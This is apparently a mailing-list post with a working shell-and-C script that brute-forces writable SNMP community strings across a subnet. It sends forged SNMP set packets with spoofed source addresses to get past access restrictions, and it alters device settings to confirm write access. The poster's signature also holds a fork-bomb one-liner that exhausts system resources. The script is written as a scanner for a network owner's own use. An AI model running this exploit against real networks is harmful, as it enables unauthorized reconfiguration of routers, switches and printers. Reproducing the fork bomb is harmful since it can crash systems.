Hmm, to keep you busy, here's brute-force spoofing scanner for writable snmp communities. Requires NetCat and snmp tools (like snmpget) to be installed. Scanning is mostly harmless - it tries to change system.sysContact.0 to 'null' using common default communities (according to securityfocus). Should be run as root. In addition to list of machines given in initial post, it is known to break some Cisco systems (but not recent IOSes, at least not in default configuration), most of 3com products (there was another writable community, which seems to be present everywhere, regardless of 'private', which is disabled by administrators sometimes), HP switches, printers, Ascend *DSL modems etc. Also, it should bypass most of stupid source IP address restrictions for accessing the community. Please use this tool to scan your network only. _______________________________________________________ Michal Zalewski * [[EMAIL PROTECTED]] <=> [AGS WAN SYSADM] [dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl] [+48 22 551 45 93] [+48 603 110 160] bash$ :(){ :|:&};: =-----=> God is real, unless declared integer. <=-----=
#!/bin/sh rm -f .walk.tmp* /tmp/spoof-* WYSZLO &>/dev/null echo "snmpd vulnerability scanner by <[EMAIL PROTECTED]>" echo x=$1 PRE=$2 if [ "$2" = "" ]; then echo "Usage: $0 start_at c_subnet" echo "example: '$0 0 172.16.1' will scan 172.16.1.0-255." echo exit fi SPFILE="/tmp/spoof-$$" cat >$SPFILE.c <<_EOF_ char buf[1000]; char part1[]="0\202\0-\2\1\0\4"; char part2[]="\243\37\2\1\1\2\1\0\2\1\0000\0240\202\0\20\6\10+\6\1\2\1\1\4\0\4\4null"; main(int argc,char**argv) { char x=strlen(argv[1]); memcpy(buf,part1,sizeof(part1)-1); memcpy(buf+sizeof(part1)-1,&x,1); strcpy(buf+sizeof(part1),argv[1]); memcpy(buf+sizeof(part1)+x,part2,sizeof(part2)-1); write(1,buf,x+1+sizeof(part1)+sizeof(part2)); } _EOF_ echo "Compiling helper application..." gcc -o $SPFILE $SPFILE.c test -x $SPFILE || exit echo "Scan range: $PRE.$x-255..." if [ "$1" = "0" ]; then echo "* Collecting routing information (6 seconds)..." /usr/sbin/traceroute -n -f 3 -w 60 $PRE.32 2>/dev/null >.walk.tmp & sleep 6 killall traceroute &>/dev/null awk '{print $2}' .walk.tmp >.walk.tmp2 fi echo "Starting scan. Outfile is: WYSZLO" while [ "$x" -lt "256" ]; do echo $PRE.$x >>.walk.tmp2 let x=x+1 done COMMUNITIES="public private write all monitor agent manager OrigEquipMfr admin default password tivoli openview community snmp snmpd system" for i in `cat .walk.tmp2`; do echo -n "$i: " snmpget -R 2 $i public system.sysDescr.0 &>.walk.tmp ERR="`grep -c -iE 'refuse|error|timeout|fail|denied|found|acce' .walk.tmp`" if [ "$ERR" = "0" ]; then echo "OK" echo -n " system: " awk -F'"' '{print $2}' .walk.tmp >.walk.tmp2 SYS="`cat .walk.tmp2`" echo "$SYS" snmpget -R 2 $i public system.sysDescr.0 &>.walk.tmp awk -F'"' '{print $2}' .walk.tmp >.walk.tmp2 SYSNAME="`awk '{print $1}' .walk.tmp2`" echo "$i ($SYS):" >>WYSZLO for j in $COMMUNITIES 'all private' 'Secret C0de' $SYSNAME; do echo -n " $j> " $SPFILE "$j" | nc -u $i 161 &>/dev/null & $SPFILE "$j" | nc -s 127.0.0.1 -u $i 161 &>/dev/null & $SPFILE "$j" | nc -s $i -u $i 161 &>/dev/null & $SPFILE "$j" | nc -s $PRE.1 -u $i 161 &>/dev/null & sleep 1 killall nc &>/dev/null snmpget -R 2 $i public system.sysContact.0 &>.walk.tmp WORKED="`grep -c null .walk.tmp 2>/dev/null`" if [ "$WORKED" = "0" ]; then echo " - $j failed." >>WYSZLO echo "failed." else echo "OK" echo " - $j WORKED." >>WYSZLO break fi done else echo "milczy..." fi done echo "Done." rm -f .walk.tmp* $SPFILE*